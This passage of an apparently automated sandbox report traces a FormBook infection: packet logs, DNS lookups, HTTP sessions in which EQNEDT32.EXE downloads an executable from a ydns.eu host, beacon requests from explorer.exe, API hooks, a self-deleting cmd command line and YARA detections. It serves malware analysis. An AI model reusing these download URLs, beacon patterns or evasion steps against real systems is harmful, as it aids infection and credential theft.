                                                                                                                                                Nov 20, 2020 11:23:48.341631889 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341661930 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341671944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341689110 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341717005 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341743946 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341772079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341787100 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341799974 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341804981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341808081 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341810942 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341813087 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341828108 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.341837883 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.341861963 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551002979 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551007032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551043034 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551044941 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551081896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551083088 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551121950 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551130056 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551167965 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551171064 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551209927 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551212072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551249027 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551261902 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551286936 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551287889 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551322937 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551327944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551359892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551362038 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551395893 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551398993 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551434994 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551443100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551485062 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551485062 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551522017 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551522017 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551562071 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551562071 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551599979 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551603079 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551637888 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551637888 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551671982 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551676035 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551712990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551723957 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551748991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551759005 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551798105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551800013 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551836967 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551839113 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551872969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551875114 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551911116 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551913023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551949024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.551949978 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551985025 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.551985979 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552022934 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552022934 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552064896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552069902 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552109003 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552112103 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552149057 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552150011 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552187920 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552192926 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552227020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552227974 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552264929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552265882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552301884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552301884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552337885 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552340031 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552377939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552387953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552428961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552429914 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552465916 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552470922 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552500010 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552504063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552539110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552541971 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552577019 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552577972 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552613020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552615881 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552651882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552653074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552689075 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552700043 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552736998 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552742958 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552779913 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552781105 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552814960 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552819014 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552853107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552856922 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552892923 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552895069 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552931070 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.552932024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552969933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.552999020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553010941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553023100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553065062 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553067923 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553102016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553134918 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553142071 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.553150892 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.553184986 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.556823969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566247940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566281080 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566307068 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566328049 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566346884 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566349030 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566349983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566394091 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566395044 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566428900 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566440105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566464901 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566471100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566509008 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566534996 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566572905 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566572905 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.566595078 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.566611052 CET4916580192.168.2.22103.125.191.5

                                                                                                                                                UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 11:23:46.500763893 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 11:23:46.550245047 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 11:24:55.833583117 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 11:24:55.879791975 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 11:25:16.152932882 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 11:25:16.491955996 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22

                                                                                                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 11:23:46.500763893 CET | 192.168.2.22 | 8.8.8.8 | 0x8ac6 | Standard query (0) | workfinethdysanotherrainbowlomoyentthghf.ydns.eu | A (IP address) | IN (0x0001)
Nov 20, 2020 11:24:55.833583117 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.pestigenix.com | A (IP address) | IN (0x0001)
Nov 20, 2020 11:25:16.152932882 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.atlanticdentallab.com | A (IP address) | IN (0x0001)

                                                                                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 11:23:46.550245047 CET | 8.8.8.8 | 192.168.2.22 | 0x8ac6 | No error (0) | workfinethdysanotherrainbowlomoyentthghf.ydns.eu |  | 103.125.191.5 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:24:55.879791975 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.pestigenix.com |  | 91.195.241.137 | A (IP address) | IN (0x0001)
Nov 20, 2020 11:25:16.491955996 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.atlanticdentallab.com |  | 180.215.92.80 | A (IP address) | IN (0x0001)

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • workfinethdysanotherrainbowlomoyentthghf.ydns.eu
                                                                                                                                                • www.pestigenix.com
                                                                                                                                                • www.atlanticdentallab.com

                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:23:46.787297010 CET | 0 | OUT | GET /worksdoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
Connection: Keep-Alive

Nov 20, 2020 11:23:47.007692099 CET | 2 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 10:23:44 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 19 Nov 2020 21:43:46 GMT
ETag: "92600-5b47c9f64afa6"
Accept-Ranges: bytes
Content-Length: 599552
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.195.241.137 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:24:55.913090944 CET | 636 | OUT | GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
Host: www.pestigenix.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:24:55.956897974 CET | 637 | IN | HTTP/1.1 302 Found
date: Fri, 20 Nov 2020 10:24:55 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NAnNDwyJzoYm1RRySDngvvHUFtvgQ2obU/nMiHo+KjE4OG0hZk4DAqRZfsqVz6DfJjgTkeN2ab0W7fbLhn4rdw==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Fri, 20 Nov 2020 10:24:55 GMT
location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=pestigenix.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-787d9d44d9-l79rg
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 180.215.92.80 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:25:16.686966896 CET | 638 | OUT | GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
Host: www.atlanticdentallab.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:25:17.932526112 CET | 638 | IN | HTTP/1.1 302 Found
Transfer-Encoding: chunked
Location: /waf_verify.htm
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Fri, 20 Nov 2020 10:24:14 GMT
Connection: close
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                Code Manipulations

                                                                                                                                                User Modules

                                                                                                                                                Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1


                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:11:22:56
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x13f650000
                                                                                                                                                File size:27641504 bytes
                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:23:16
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:543304 bytes
                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:23:19
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                File size:599552 bytes
                                                                                                                                                MD5 hash:429BBA6DBE159C300679509BE3085665
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 33%, ReversingLabs
                                                                                                                                                Reputation:low

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:11:23:24
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                File size:64672 bytes
                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:11:23:26
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0x4a2b0000
                                                                                                                                                File size:302592 bytes
                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:
                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                File size:3229696 bytes
                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate

                                                                                                                                                General

                                                                                                                                                Start time:11:23:27
